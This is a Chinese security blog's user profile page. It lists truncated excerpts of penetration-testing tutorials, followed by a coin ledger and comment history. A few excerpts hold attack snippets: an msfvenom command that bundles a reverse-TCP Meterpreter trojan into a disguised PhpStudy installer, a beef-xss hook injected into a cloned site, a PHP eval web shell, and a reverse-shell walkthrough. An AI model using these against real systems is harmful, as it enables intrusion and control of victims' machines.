手机抓包 HttpCanary v3.3.6
软件介绍HttpCanary,手机抓包大师,最强Android抓包工具。无需ROOT权限,安卓专业强大的HTTP协议抓包和分析工具,支持对HTTP1.0/1.1/2/HTTPS/WebSocket/TLS/SSL等网络协议抓取和注入,支持静态注入和动态注入模式,对抓包内容请求参数,修改请求参数、请求头、请求体、响应码、响应头和响应体等数据。软件截图……
会员资料
ID:1
邮箱:您没有查看权限
网站:https://www.xy586.top/
QQ:该用户很懒,还没有填写QQ哦。
最近登录:2020-10-14 19:20:39
加入时间:2020-03-12 13:23:45
简介:该用户很懒,还没有填写个人简介。
社交网络
新浪微博 :该用户很懒,还没有填写新浪微博。
百度ID :该用户很懒,还没有填写百度ID。
Twitter :该用户很懒,还没有填写Twitter。
GitHub :该用户很懒,还没有填写GitHub。
OWASP TOP 10
OWASP Top 10OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。A1 注入injection……
3天教你一招渗透江湖绝学
教程介绍从漏洞中学习代码,在代码中寻找漏洞,本课程教你学会主流的安全渗透实战技能,让学习网络安全成为一件简单的事!……
网易web安全工程师进阶版
教程介绍《Web安全工程师(进阶)》是由“ i春秋学院联合网易安全部”出品,资深讲师团队通过精炼的教学内容、丰富的实际场景及综合项目实战,帮助学员纵向提升技能,横向拓宽视野,牢靠掌握Web安全工程师核心知识,成为安全领域高精尖人才。……
网站克隆:setoolkit社工软件
beef-xss安装beef-xss:1apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.……
msf工具之木马程序制作以及伪装
捆绑木马使用msfvenom制作木马程序:#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe将木马文件放入靶机中……
Github文件在线加速下载
众所周知,GitHub是一个巨大的开源宝库,以及程序员和编程爱好者的聚集地,诸多优秀的开源项目全部都是位于GitHub上。但是每当我们看到优秀的开源项目,准备去下(bai)载(piao)时,会发现速度异常之慢!就我个人而言,在我家里200M电信宽带的环境下,就没发现速度大于过20KB/S的时候,这简直太难受了。今天分享一批提供在线加速下载的网站!ht……
PHP反序列化漏洞原理及示例
PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00classna……
未授权访问漏洞原理及复现
未授权访问前提知识ssh免密登录客户端进入.ssh文件1cd .ssh/生成公私钥1ssh-keygen -t rsa上传公钥到服务端 1ssh-copy-id user@ip更改.ssh目录跟私钥的权限1chmod 700 .ssh/1chmod 600 .ssh/id_rsa服务端……
XXE实体注入漏洞详解
什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML……
WinHex v20.0 绿色单文件版
软件介绍X-Ways WinHex,全球知名的计算机取证及数据恢复软件,十六进制编辑器和磁盘编辑器。这款专业十六进制编辑器,用于取证搜集、数据恢复、文件分析和编辑、底层数据处理和安全领域收集文件报告。使用它可以检查修复各种文件、硬盘及内存卡等损坏造成的数据丢失等问题,编辑修改Hex与ASCII编码,多文件搜索与替换,磁盘扇区 (支持FAT16、FAT32和……
任意文件包含漏洞的绕过方式
前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>')……
任意文件包含漏洞原理解析及演示
原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行……
中间件的解析漏洞详解及演示
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。类型:IIS 5.x/6.0解析漏洞IIS 7.0/IIS 7.5/Nginx <0.8.3畸形解析漏洞Nginx <8.03 空字节代码执行漏洞Apache……
2020年web安全渗透测试课
教程介绍大家都知道程序是由代码组成,程序员就是代码的发明者,大家看不懂的代码对于他们来说却像是亲切的孩子,所有的代码在他们手下栩栩如生,但是不是所有的程序员都能够把自己孩子安排妥当,有时候会出现一些错误,但是他们发现不了。虽然网络安全已被高度重视,一些意外情况发生也会令人措手不及,正所谓常在河边走,哪有不湿鞋?一些意外发生之后的应对措施,如果采取的好……
基于JavaScript的rce反弹shell漏洞
环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下1git clone https://github.com/CroweCybers……
永恒之蓝漏洞原理及利用
摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过……
RCE(远程命令/代码执行漏洞)原理及复现
作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后……
SSRF服务端请求伪造——原理及绕过姿势
原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的……
CSRF跨站请求伪造——原理及复现
原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当……
共有 156 篇文章,仅显示前20篇文章,更多文章请登录进入后台查看
您已发表15条评论。
当前拥有 14 金币,小有余财
金币细节
| 日期时间 | 金币 | 类别 | 状态 | 描述 |
|---|---|---|---|---|
| 2020-05-26 02:57:30 | 1 | 充值 | accepted | comment_posted_39 |
| 2020-06-02 08:56:37 | 1 | 充值 | accepted | comment_posted_45 |
| 2020-06-02 08:57:31 | 1 | 充值 | accepted | comment_posted_46 |
| 2020-06-02 08:59:04 | 1 | 充值 | accepted | comment_posted_47 |
| 2020-06-03 08:55:16 | 1 | 充值 | accepted | comment_posted_51 |
| 2020-06-03 08:55:41 | 1 | 充值 | accepted | comment_posted_52 |
| 2020-06-16 09:47:17 | 1 | 充值 | accepted | comment_posted_53 |
| 2020-07-10 04:31:02 | 1 | 充值 | accepted | comment_posted_56 |
| 2020-07-26 06:41:47 | 1 | 充值 | accepted | comment_posted_61 |
| 2020-08-03 07:09:59 | 1 | 充值 | accepted | comment_posted_62 |
| 2020-08-03 07:11:34 | 1 | 充值 | accepted | comment_posted_63 |
| 2020-08-03 07:13:17 | 1 | 充值 | accepted | comment_posted_64 |
| 2020-08-03 07:14:23 | 1 | 充值 | accepted | comment_posted_65 |
| 2020-08-03 07:34:56 | 1 | 充值 | accepted | comment_posted_68 |
已添加贵站,欢迎来访
2020-07-26 14:41:46 发表在 友情链接每天11点开放名额
2020-07-10 12:31:01 发表在 阿里云打卡7天领Flink定制T恤签到成功!签到时间:2020-06-16 17:46:33,每日打卡,生活更精彩哦~
2020-06-16 17:47:16 发表在 网站源码——爱的小窝其实更适合微商
2020-06-03 16:55:40 发表在 在线生成装逼图片引流源码建议你下载,万一有呢
2020-06-03 16:55:15 发表在 电脑看据神器ZY Player1.0.13检测到贵站未添加本站友链,请先添加。
2020-06-02 16:59:04 发表在 友情链接哈哈,还是有部分学校继续网课的,总有用到的
2020-06-02 16:57:30 发表在 网课搜题助手这玩意用来防和谐的,伪加密
2020-06-02 16:56:37 发表在 社会主义核心价值观编码源码没有啊,都是同一套模板二改的
2020-05-26 10:57:29 发表在 HTML源码——简单注册登录页面被特别在乎的人忽略,会很难过,而更难过的是你还要装作你不在乎。
2020-05-05 11:56:34 发表在 HTML响应式后台登录模板就连一直都无容身之地的我……也不是可以任意舍弃的生命。
2020-04-14 22:22:06 发表在 博客建立路程贵站已加
2020-04-03 09:17:11 发表在 友情链接友链已加
2020-03-27 11:30:56 发表在 留言板已添加贵站
2020-03-25 12:55:13 发表在 友情链接已修复
2020-03-21 13:36:22 发表在 留言板